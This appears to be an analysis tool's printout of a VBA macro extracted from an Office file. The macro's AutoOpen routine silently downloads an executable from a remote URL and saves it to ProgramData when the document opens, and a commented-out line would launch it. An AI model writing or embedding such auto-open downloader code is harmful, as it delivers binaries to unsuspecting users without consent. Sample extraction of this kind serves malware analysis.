Filename     : ./macros/3dddd6d4cba6c5c912f3b761e6b3f33dace98b372ee12cf3dbfce1866cf54c16
OLE stream   : Macros/VBA/NewMacros
VBA filename : NewMacros.bas
----------------------------------------
Attribute VB_Name = "NewMacros"
Sub AutoOpen()

Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://dl.360safe.com/inst.exe", False
xHttp.Send

With bStrm
 .Type = 1 '//binary
 .Open
 .write xHttp.responseBody
 .savetofile "C:\\ProgramData\\360360-41.exe", 2 '//overwrite
End With

'Shell C:\ProgramData\360360.exe

End Sub
